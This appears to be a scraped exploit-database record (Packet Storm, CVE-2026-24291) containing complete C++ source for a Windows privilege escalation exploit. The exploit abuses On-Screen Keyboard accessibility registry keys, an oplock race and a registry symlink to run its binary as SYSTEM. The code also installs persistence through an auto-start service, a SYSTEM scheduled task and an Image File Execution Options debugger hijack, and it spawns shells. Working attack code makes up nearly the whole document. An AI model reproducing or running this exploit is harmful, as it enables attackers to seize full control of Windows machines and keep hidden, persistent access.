{“lastseen”:”2026-04-27T16:34:45″,”description”:”The provided code is a conceptual Windows privilege escalation exploit targeting the On-Screen Keyboard osk.exe and Accessibility AT registry infrastructure. It attempts to abuse weak trust boundaries between user-level registry configuration and…”,”published”:”2026-04-27T00:00:00″,”modified”:”2026-04-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OSK Registry-Based Privilege Escalation \/ Symlink Attack”,”source”:””,”references”:””,”id”:”PACKETSTORM:219845″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24291″],”sourceData”:”==================================================================================================================================\\n | # Title : OSK Registry-Based Privilege Escalation via Accessibility\/AT Abuse and Registry Symlink Manipulation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : No standalone download available |\\n ==================================================================================================================================\\n \\n [+] Summary : The provided code is a conceptual Windows privilege escalation exploit targeting the On-Screen Keyboard (osk.exe) and Accessibility (AT) registry infrastructure. \\n It attempts to abuse weak trust boundaries between user-level registry configuration and system-level execution paths.\\n \\n [+] POC : \\n \\n \\n #include \\u003cWindows.h\\u003e\\n #include \\u003ccomdef.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cvector\\u003e\\n #include \\u003cstring\\u003e\\n #include \\u003cthread\\u003e\\n #include \\u003cchrono\\u003e\\n #include \\u003csddl.h\\u003e\\n #include \\u003cwinternl.h\\u003e\\n #include \\u003caclapi.h\\u003e\\n #include \\u003cfstream\\u003e\\n #include \\u003cfilesystem\\u003e\\n \\n #pragma comment(lib, \\”advapi32.lib\\”)\\n #pragma comment(lib, \\”user32.lib\\”)\\n #pragma comment(lib, \\”ntdll.lib\\”)\\n \\n bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile);\\n bool DeleteRegSymlink(LPCWSTR lpSymlink);\\n \\n constexpr wchar_t kAtKey[] = L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\ATs\\\\\\\\system_escape\\”;\\n constexpr wchar_t kTargetKey[] = L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Image File Execution Options\\\\\\\\osk.exe\\”;\\n constexpr wchar_t kDebuggerValue[] = L\\”Debugger\\”;\\n \\n class ScopedRegHandle {\\n private:\\n HKEY m_hKey;\\n \\n public:\\n ScopedRegHandle() : m_hKey(nullptr) {}\\n ScopedRegHandle(HKEY hKey) : m_hKey(hKey) {}\\n \\n ~ScopedRegHandle() { Close(); }\\n \\n void Close() {\\n if (m_hKey \\u0026\\u0026 m_hKey != INVALID_HANDLE_VALUE) {\\n RegCloseKey(m_hKey);\\n m_hKey = nullptr;\\n }\\n }\\n \\n bool IsValid() const { return m_hKey \\u0026\\u0026 m_hKey != INVALID_HANDLE_VALUE; }\\n HKEY* GetPtr() { return \\u0026m_hKey; }\\n operator HKEY() const { return m_hKey; }\\n \\n bool SetString(LPCWSTR name, LPCWSTR value) const {\\n if (!IsValid()) return false;\\n DWORD size = static_cast\\u003cDWORD\\u003e((wcslen(value) + 1) * sizeof(WCHAR));\\n return RegSetValueExW(m_hKey, name, 0, REG_SZ, \\n reinterpret_cast\\u003cconst BYTE*\\u003e(value), size) == ERROR_SUCCESS;\\n }\\n \\n bool SetDWORD(LPCWSTR name, DWORD value) const {\\n if (!IsValid()) return false;\\n return RegSetValueExW(m_hKey, name, 0, REG_DWORD, \\n reinterpret_cast\\u003cconst BYTE*\\u003e(\\u0026value), sizeof(value)) == ERROR_SUCCESS;\\n }\\n \\n ScopedRegHandle(ScopedRegHandle\\u0026\\u0026 other) noexcept : m_hKey(other.m_hKey) {\\n other.m_hKey = nullptr;\\n }\\n \\n ScopedRegHandle\\u0026 operator=(ScopedRegHandle\\u0026\\u0026 other) noexcept {\\n if (this != \\u0026other) {\\n Close();\\n m_hKey = other.m_hKey;\\n other.m_hKey = nullptr;\\n }\\n return *this;\\n }\\n \\n ScopedRegHandle(const ScopedRegHandle\\u0026) = delete;\\n ScopedRegHandle\\u0026 operator=(const ScopedRegHandle\\u0026) = delete;\\n };\\n \\n class RegistryHelper {\\n public:\\n static std::wstring GetUserSid() {\\n HANDLE hToken = nullptr;\\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026hToken))\\n return L\\”\\”;\\n \\n DWORD dwSize = 0;\\n GetTokenInformation(hToken, TokenUser, nullptr, 0, \\u0026dwSize);\\n \\n std::vector\\u003cBYTE\\u003e buffer(dwSize);\\n if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, \\u0026dwSize)) {\\n CloseHandle(hToken);\\n return L\\”\\”;\\n }\\n \\n PTOKEN_USER pTokenUser = reinterpret_cast\\u003cPTOKEN_USER\\u003e(buffer.data());\\n LPWSTR lpSid = nullptr;\\n \\n if (!ConvertSidToStringSidW(pTokenUser-\\u003eUser.Sid, \\u0026lpSid)) {\\n CloseHandle(hToken);\\n return L\\”\\”;\\n }\\n \\n std::wstring sid(lpSid);\\n LocalFree(lpSid);\\n CloseHandle(hToken);\\n \\n return sid;\\n }\\n \\n static std::wstring BuildSessionPath() {\\n DWORD sessionId = 0;\\n ProcessIdToSessionId(GetCurrentProcessId(), \\u0026sessionId);\\n \\n wchar_t path[512];\\n swprintf_s(path, L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\Session%d\\”, sessionId);\\n return std::wstring(path);\\n }\\n \\n static std::wstring BuildOskConfigPath() {\\n return BuildSessionPath() + L\\”\\\\\\\\ATConfig\\\\\\\\Osk\\”;\\n }\\n \\n static std::wstring BuildAtKeyPath() {\\n return std::wstring(kAtKey);\\n }\\n \\n static bool CreateRegistryKey(const std::wstring\\u0026 path, bool volatileKey = false) {\\n std::wstring cleanPath = path;\\n if (cleanPath.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n cleanPath = cleanPath.substr(5);\\n }\\n \\n HKEY hKey = nullptr;\\n DWORD disposition = 0;\\n DWORD options = volatileKey ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE;\\n \\n LSTATUS status = RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,\\n options, KEY_ALL_ACCESS, nullptr, \\u0026hKey, \\u0026disposition);\\n if (status == ERROR_SUCCESS) {\\n RegCloseKey(hKey);\\n return true;\\n }\\n return false;\\n }\\n \\n static bool DeleteRegistryKey(const std::wstring\\u0026 path) {\\n std::wstring cleanPath = path;\\n if (cleanPath.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n cleanPath = cleanPath.substr(5);\\n }\\n return RegDeleteTreeW(HKEY_LOCAL_MACHINE, cleanPath.c_str()) == ERROR_SUCCESS;\\n }\\n \\n static bool SetRegistryValues(const std::wstring\\u0026 path, \\n const std::map\\u003cstd::wstring, std::wstring\\u003e\\u0026 stringValues,\\n const std::map\\u003cstd::wstring, DWORD\\u003e\\u0026 dwordValues = {}) {\\n std::wstring cleanPath = path;\\n if (cleanPath.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n cleanPath = cleanPath.substr(5);\\n }\\n \\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, KEY_SET_VALUE, \\u0026hKey) != ERROR_SUCCESS) {\\n return false;\\n }\\n \\n for (const auto\\u0026 [name, value] : stringValues) {\\n DWORD size = static_cast\\u003cDWORD\\u003e((value.length() + 1) * sizeof(WCHAR));\\n RegSetValueExW(hKey, name.c_str(), 0, REG_SZ, \\n reinterpret_cast\\u003cconst BYTE*\\u003e(value.c_str()), size);\\n }\\n \\n for (const auto\\u0026 [name, value] : dwordValues) {\\n RegSetValueExW(hKey, name.c_str(), 0, REG_DWORD,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(\\u0026value), sizeof(value));\\n }\\n \\n RegCloseKey(hKey);\\n return true;\\n }\\n };\\n \\n class FileOpLock {\\n private:\\n HANDLE m_hFile;\\n OVERLAPPED m_overlapped;\\n HANDLE m_hCompletionEvent;\\n PTP_WAIT m_pWait;\\n std::function\\u003cvoid()\\u003e m_callback;\\n bool m_locked;\\n \\n static VOID CALLBACK WaitCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Parameter,\\n PTP_WAIT Wait, TP_WAIT_RESULT WaitResult) {\\n FileOpLock* pLock = reinterpret_cast\\u003cFileOpLock*\\u003e(Parameter);\\n pLock-\\u003eOnOplockTriggered();\\n }\\n \\n void OnOplockTriggered() {\\n DWORD bytesReturned = 0;\\n if (GetOverlappedResult(m_hFile, \\u0026m_overlapped, \\u0026bytesReturned, TRUE)) {\\n if (m_callback) {\\n m_callback();\\n }\\n }\\n SetEvent(m_hCompletionEvent);\\n }\\n \\n public:\\n FileOpLock() : m_hFile(INVALID_HANDLE_VALUE), m_overlapped({0}), \\n m_hCompletionEvent(nullptr), m_pWait(nullptr), m_locked(false) {\\n m_overlapped.hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr);\\n m_hCompletionEvent = CreateEvent(nullptr, TRUE, FALSE, nullptr);\\n }\\n \\n ~FileOpLock() {\\n if (m_pWait) {\\n SetThreadpoolWait(m_pWait, nullptr, nullptr);\\n CloseThreadpoolWait(m_pWait);\\n }\\n if (m_overlapped.hEvent) CloseHandle(m_overlapped.hEvent);\\n if (m_hCompletionEvent) CloseHandle(m_hCompletionEvent);\\n if (m_hFile != INVALID_HANDLE_VALUE) CloseHandle(m_hFile);\\n }\\n \\n bool Acquire(const std::wstring\\u0026 filePath, std::function\\u003cvoid()\\u003e callback) {\\n m_callback = callback;\\n \\n m_hFile = CreateFileW(filePath.c_str(), FILE_READ_ATTRIBUTES,\\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\\n nullptr, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, nullptr);\\n \\n if (m_hFile == INVALID_HANDLE_VALUE) {\\n printf(\\”[!] Failed to open file: %d\\\\n\\”, GetLastError());\\n return false;\\n }\\n \\n m_pWait = CreateThreadpoolWait(WaitCallback, this, nullptr);\\n if (!m_pWait) {\\n printf(\\”[!] Failed to create threadpool wait\\\\n\\”);\\n return false;\\n }\\n \\n SetThreadpoolWait(m_pWait, m_overlapped.hEvent, nullptr);\\n \\n DWORD bytesReturned = 0;\\n REQUEST_OPLOCK_INPUT_BUFFER inputBuffer = {0};\\n REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer = {0};\\n \\n inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;\\n inputBuffer.StructureLength = sizeof(inputBuffer);\\n inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;\\n inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;\\n outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;\\n outputBuffer.StructureLength = sizeof(outputBuffer);\\n \\n if (!DeviceIoControl(m_hFile, FSCTL_REQUEST_OPLOCK, \\u0026inputBuffer, sizeof(inputBuffer),\\n \\u0026outputBuffer, sizeof(outputBuffer), \\u0026bytesReturned, \\u0026m_overlapped)) {\\n DWORD err = GetLastError();\\n if (err != ERROR_IO_PENDING) {\\n printf(\\”[!] OpLock failed: %d\\\\n\\”, err);\\n return false;\\n }\\n }\\n \\n m_locked = true;\\n return true;\\n }\\n \\n void Wait(DWORD timeoutMs = INFINITE) {\\n if (m_locked) {\\n WaitForSingleObject(m_hCompletionEvent, timeoutMs);\\n }\\n }\\n };\\n \\n class OSKEoPExploit {\\n private:\\n std::wstring m_sessionPath;\\n std::wstring m_oskConfigPath;\\n std::wstring m_atKeyPath;\\n std::wstring m_executablePath;\\n bool m_debugMode;\\n \\n void EnsureOSKInitialized() {\\n printf(\\”[*] Ensuring OSK is initialized on normal desktop…\\\\n\\”);\\n \\n ShellExecuteW(nullptr, L\\”open\\”, L\\”osk.exe\\”, L\\”\\”, nullptr, SW_SHOW);\\n Sleep(3000);\\n \\n HWND hWnd = FindWindowW(nullptr, L\\”On-Screen Keyboard\\”);\\n if (hWnd) {\\n PostMessageW(hWnd, WM_CLOSE, 0, 0);\\n Sleep(1000);\\n }\\n \\n printf(\\”[+] OSK initialized\\\\n\\”);\\n }\\n \\n bool PrepareMaliciousAtKey() {\\n printf(\\”[*] Preparing malicious AT entry…\\\\n\\”);\\n \\n RegistryHelper::DeleteRegistryKey(m_atKeyPath);\\n \\n if (!RegistryHelper::CreateRegistryKey(m_atKeyPath, false)) {\\n printf(\\”[!] Failed to create AT key\\\\n\\”);\\n return false;\\n }\\n \\n std::map\\u003cstd::wstring, std::wstring\\u003e values = {\\n {L\\”ApplicationName\\”, L\\”System Escalation\\”},\\n {L\\”ATExe\\”, L\\”cmd.exe\\”},\\n {L\\”Description\\”, L\\”Privilege escalation via OSK\\”},\\n {L\\”StartExe\\”, m_executablePath},\\n {L\\”Profile\\”, L\\”\\u003cHCIModel\\u003e\\u003cAccommodation type=\\\\\\”severe dexterity\\\\\\” \/\\u003e\\u003c\/HCIModel\\u003e\\”},\\n {L\\”SimpleProfile\\”, L\\”EoP Exploit\\”}\\n };\\n \\n if (!RegistryHelper::SetRegistryValues(m_atKeyPath, values)) {\\n printf(\\”[!] Failed to set AT values\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”[+] Malicious AT entry created at: %ls\\\\n\\”, m_atKeyPath.c_str());\\n return true;\\n }\\n \\n bool PrepareOskConfigValues() {\\n printf(\\”[*] Preparing OSK configuration values…\\\\n\\”);\\n \\n std::wstring oskConfigPath = RegistryHelper::BuildOskConfigPath();\\n RegistryHelper::DeleteRegistryKey(oskConfigPath);\\n if (!RegistryHelper::CreateRegistryKey(oskConfigPath, true)) {\\n printf(\\”[!] Failed to create OSK config key\\\\n\\”);\\n return false;\\n }\\n \\n std::map\\u003cstd::wstring, std::wstring\\u003e values = {\\n {L\\”ApplicationName\\”, L\\”System Escalation\\”},\\n {L\\”ATExe\\”, L\\”explorer.exe\\”},\\n {L\\”Description\\”, L\\”EoP via OSK\\”},\\n {L\\”StartExe\\”, m_executablePath},\\n {L\\”Profile\\”, L\\”\\u003cHCIModel\\u003e\\u003cAccommodation type=\\\\\\”severe dexterity\\\\\\” \/\\u003e\\u003c\/HCIModel\\u003e\\”},\\n {L\\”SimpleProfile\\”, L\\”EoP Exploit\\”},\\n {L\\”SecureConfiguration\\”, L\\”hack\\”} \\n };\\n \\n if (!RegistryHelper::SetRegistryValues(oskConfigPath, values)) {\\n printf(\\”[!] Failed to set OSK config values\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”[+] OSK configuration prepared\\\\n\\”);\\n return true;\\n }\\n \\n bool CreateDebuggerPersistence() {\\n printf(\\”[*] Creating debugger persistence (optional)…\\\\n\\”);\\n if (!RegistryHelper::CreateRegistryKey(kTargetKey, false)) {\\n return false;\\n }\\n HKEY hKey = nullptr;\\n std::wstring cleanPath = kTargetKey;\\n if (cleanPath.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n cleanPath = cleanPath.substr(5);\\n }\\n \\n if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n RegSetValueExW(hKey, kDebuggerValue, 0, REG_SZ,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(m_executablePath.c_str()),\\n static_cast\\u003cDWORD\\u003e((m_executablePath.length() + 1) * sizeof(WCHAR)));\\n RegCloseKey(hKey);\\n printf(\\”[+] Debugger persistence configured\\\\n\\”);\\n return true;\\n }\\n \\n return false;\\n }\\n \\n bool TriggerSecureDesktop() {\\n printf(\\”[*] Triggering secure desktop switch…\\\\n\\”);\\n SHELLEXECUTEINFOW sei = { sizeof(sei) };\\n sei.lpVerb = L\\”runas\\”;\\n sei.lpFile = L\\”cmd.exe\\”;\\n sei.lpParameters = L\\”\/c echo Exploit triggered \\u003e nul\\”;\\n sei.nShow = SW_HIDE;\\n \\n if (!ShellExecuteExW(\\u0026sei)) {\\n printf(\\”[!] Failed to trigger elevation\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”[+] Secure desktop triggered (UAC prompt should appear)\\\\n\\”);\\n return true;\\n }\\n \\n void WaitForOskOnSecureDesktop() {\\n printf(\\”[*] Waiting for OSK on secure desktop…\\\\n\\”);\\n for (int i = 0; i \\u003c 30; i++) {\\n HWND hWnd = FindWindowW(nullptr, L\\”On-Screen Keyboard\\”);\\n if (hWnd) {\\n printf(\\”[+] OSK detected on secure desktop\\\\n\\”);\\n break;\\n }\\n Sleep(1000);\\n }\\n }\\n \\n bool CreateSymbolicLinkRace() {\\n printf(\\”\\\\n[*] Setting up symbolic link race condition…\\\\n\\”);\\n \\n std::wstring targetPath = RegistryHelper::BuildOskConfigPath();\\n DeleteRegSymlink(targetPath.c_str());\\n \\n if (!CreateRegSymlink(targetPath.c_str(), m_atKeyPath.c_str(), true)) {\\n printf(\\”[!] Failed to create symlink\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”[+] Symbolic link created: %ls -\\u003e %ls\\\\n\\”, targetPath.c_str(), m_atKeyPath.c_str());\\n return true;\\n }\\n \\n void Cleanup() {\\n printf(\\”\\\\n[*] Cleaning up…\\\\n\\”);\\n \\n std::wstring oskConfigPath = RegistryHelper::BuildOskConfigPath();\\n DeleteRegSymlink(oskConfigPath.c_str());\\n RegistryHelper::DeleteRegistryKey(m_atKeyPath);\\n RegistryHelper::DeleteRegistryKey(kTargetKey);\\n \\n printf(\\”[+] Cleanup completed\\\\n\\”);\\n }\\n \\n public:\\n OSKEoPExploit(bool debugMode = false) : m_debugMode(debugMode) {\\n WCHAR path[MAX_PATH];\\n GetModuleFileNameW(nullptr, path, MAX_PATH);\\n m_executablePath = path;\\n m_sessionPath = RegistryHelper::BuildSessionPath();\\n m_oskConfigPath = RegistryHelper::BuildOskConfigPath();\\n m_atKeyPath = RegistryHelper::BuildAtKeyPath();\\n }\\n \\n bool Exploit() {\\n printf(\\”\\\\n\\”);\\n printf(\\”========================================\\\\n\\”);\\n printf(\\” CVE-2026-24291 – OSK EoP Exploit\\\\n\\”);\\n printf(\\” SYSTEM Privilege Escalation\\\\n\\”);\\n printf(\\”========================================\\\\n\\\\n\\”);\\n printf(\\”[*] Exploit path: %ls\\\\n\\”, m_executablePath.c_str());\\n printf(\\”[*] Session path: %ls\\\\n\\”, m_sessionPath.c_str());\\n printf(\\”[*] OSK config path: %ls\\\\n\\”, m_oskConfigPath.c_str());\\n printf(\\”[*] AT key path: %ls\\\\n\\”, m_atKeyPath.c_str());\\n \\n EnsureOSKInitialized();\\n \\n if (!PrepareMaliciousAtKey()) {\\n printf(\\”[!] Failed to prepare AT key\\\\n\\”);\\n return false;\\n }\\n \\n if (!PrepareOskConfigValues()) {\\n printf(\\”[!] Failed to prepare OSK config\\\\n\\”);\\n return false;\\n }\\n \\n printf(\\”\\\\n[*] Creating OpLock on osk.exe…\\\\n\\”);\\n FileOpLock oplock;\\n \\n if (!oplock.Acquire(L\\”C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\osk.exe\\”, [this]() {\\n printf(\\”\\\\n[!!!] OPLOCK TRIGGERED!\\\\n\\”);\\n printf(\\”[*] Creating symbolic link for registry redirection…\\\\n\\”);\\n CreateSymbolicLinkRace();\\n })) {\\n printf(\\”[!] Failed to acquire oplock\\\\n\\”);\\n return false;\\n }\\n \\n if (!TriggerSecureDesktop()) {\\n return false;\\n }\\n \\n printf(\\”[*] Waiting for OpLock to trigger (OSK on secure desktop)…\\\\n\\”);\\n oplock.Wait(15000);\\n printf(\\”[*] Waiting for registry synchronization…\\\\n\\”);\\n Sleep(5000);\\n \\n printf(\\”\\\\n[*] Triggering AT execution…\\\\n\\”);\\n std::wstring sessionPath = m_sessionPath;\\n if (sessionPath.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n sessionPath = sessionPath.substr(5);\\n }\\n \\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, sessionPath.c_str(), 0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n std::wstring configValue = L\\”hack\\”;\\n RegSetValueExW(hKey, L\\”SecureConfiguration\\”, 0, REG_SZ,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(configValue.c_str()),\\n static_cast\\u003cDWORD\\u003e((configValue.length() + 1) * sizeof(WCHAR)));\\n RegCloseKey(hKey);\\n }\\n \\n printf(\\”[*] Triggering second secure desktop to execute malicious AT…\\\\n\\”);\\n Sleep(2000);\\n TriggerSecureDesktop();\\n printf(\\”[*] Waiting for SYSTEM execution…\\\\n\\”);\\n Sleep(8000);\\n Cleanup();\\n \\n printf(\\”\\\\n[+] Exploit completed! Check for SYSTEM shell.\\\\n\\”);\\n return true;\\n }\\n };\\n \\n class AdvancedPersistence {\\n public:\\n static bool InstallServicePersistence(const std::wstring\\u0026 executablePath) {\\n printf(\\”[*] Installing service persistence…\\\\n\\”);\\n SC_HANDLE hSCM = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_CREATE_SERVICE);\\n if (!hSCM) return false;\\n \\n SC_HANDLE hService = CreateServiceW(\\n hSCM,\\n L\\”OSKEoPService\\”,\\n L\\”OSK EoP Service\\”,\\n SERVICE_ALL_ACCESS,\\n SERVICE_WIN32_OWN_PROCESS,\\n SERVICE_AUTO_START,\\n SERVICE_ERROR_NORMAL,\\n executablePath.c_str(),\\n nullptr, nullptr, nullptr, nullptr, nullptr\\n );\\n \\n if (hService) {\\n StartServiceW(hService, 0, nullptr);\\n CloseServiceHandle(hService);\\n printf(\\”[+] Service persistence installed\\\\n\\”);\\n }\\n \\n CloseServiceHandle(hSCM);\\n return hService != nullptr;\\n }\\n \\n static bool InstallScheduledTask(const std::wstring\\u0026 executablePath) {\\n printf(\\”[*] Installing scheduled task persistence…\\\\n\\”);\\n \\n wchar_t command[512];\\n swprintf_s(command, L\\”schtasks \/create \/tn \\\\\\”OSKEoP\\\\\\” \/tr \\\\\\”%ls\\\\\\” \/sc onlogon \/ru SYSTEM \/f\\”, \\n executablePath.c_str());\\n \\n system(\\”schtasks \/delete \/tn \\\\\\”OSKEoP\\\\\\” \/f \\u003e nul 2\\u003e\\u00261\\”);\\n int result = system(command);\\n \\n if (result == 0) {\\n printf(\\”[+] Scheduled task persistence installed\\\\n\\”);\\n return true;\\n }\\n \\n return false;\\n }\\n };\\n \\n int wmain(int argc, wchar_t* argv[]) {\\n \\n bool debugMode = false;\\n bool installPersistence = false;\\n bool useDebugger = false;\\n \\n for (int i = 1; i \\u003c argc; i++) {\\n if (_wcsicmp(argv[i], L\\”–debug\\”) == 0) {\\n debugMode = true;\\n }\\n else if (_wcsicmp(argv[i], L\\”–persist\\”) == 0) {\\n installPersistence = true;\\n }\\n else if (_wcsicmp(argv[i], L\\”–debugger\\”) == 0) {\\n useDebugger = true;\\n }\\n else if (_wcsicmp(argv[i], L\\”–help\\”) == 0) {\\n printf(\\”CVE-2026-24291 – OSK EoP Exploit\\\\n\\”);\\n printf(\\”Usage: %s [options]\\\\n\\”, argv[0]);\\n printf(\\”Options:\\\\n\\”);\\n printf(\\” –debug Enable debug output\\\\n\\”);\\n printf(\\” –persist Install persistence after escalation\\\\n\\”);\\n printf(\\” –debugger Use IFEO debugger persistence\\\\n\\”);\\n printf(\\”\\\\nNote: This exploit escalates to SYSTEM privileges\\\\n\\”);\\n return 0;\\n }\\n }\\n \\n HANDLE hToken = nullptr;\\n if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026hToken)) {\\n TOKEN_ELEVATION_TYPE elevationType;\\n DWORD dwSize;\\n if (GetTokenInformation(hToken, TokenElevationType, \\u0026elevationType, sizeof(elevationType), \\u0026dwSize)) {\\n if (elevationType == TokenElevationTypeFull) {\\n printf(\\”[+] Already running with elevated privileges!\\\\n\\”);\\n printf(\\”[*] Spawning SYSTEM shell…\\\\n\\”);\\n system(\\”cmd.exe\\”);\\n return 0;\\n }\\n }\\n CloseHandle(hToken);\\n }\\n \\n OSKEoPExploit exploit(debugMode);\\n \\n if (exploit.Exploit()) {\\n printf(\\”\\\\n[+] Exploit successful!\\\\n\\”);\\n \\n if (installPersistence) {\\n WCHAR path[MAX_PATH];\\n GetModuleFileNameW(nullptr, path, MAX_PATH);\\n AdvancedPersistence::InstallServicePersistence(path);\\n AdvancedPersistence::InstallScheduledTask(path);\\n }\\n \\n if (useDebugger) {\\n \/\/ \u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-IFEO debugger\\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,\\n L\\”SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Image File Execution Options\\\\\\\\osk.exe\\”,\\n 0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n WCHAR path[MAX_PATH];\\n GetModuleFileNameW(nullptr, path, MAX_PATH);\\n RegSetValueExW(hKey, L\\”Debugger\\”, 0, REG_SZ,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(path),\\n static_cast\\u003cDWORD\\u003e((wcslen(path) + 1) * sizeof(WCHAR)));\\n RegCloseKey(hKey);\\n printf(\\”[+] IFEO Debugger persistence configured\\\\n\\”);\\n }\\n }\\n \\n printf(\\”\\\\n[*] To get SYSTEM shell, wait for scheduled task or service to trigger.\\\\n\\”);\\n printf(\\”[*] Alternatively, run osk.exe again to trigger debugger.\\\\n\\”);\\n printf(\\”\\\\n[*] Attempting to spawn SYSTEM shell…\\\\n\\”);\\n Sleep(3000);\\n \\n ShellExecuteW(nullptr, L\\”runas\\”, L\\”cmd.exe\\”, L\\”\/k whoami\\”, nullptr, SW_SHOW);\\n \\n } else {\\n printf(\\”\\\\n[!] Exploit failed. Try running OSK manually first.\\\\n\\”);\\n return 1;\\n }\\n \\n return 0;\\n }\\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219845″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219845\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-27T16:34:45″,”description”:”The provided code is a conceptual Windows privilege escalation exploit targeting the On-Screen Keyboard osk.exe and Accessibility AT registry infrastructure. It attempts to abuse weak…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-49744","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n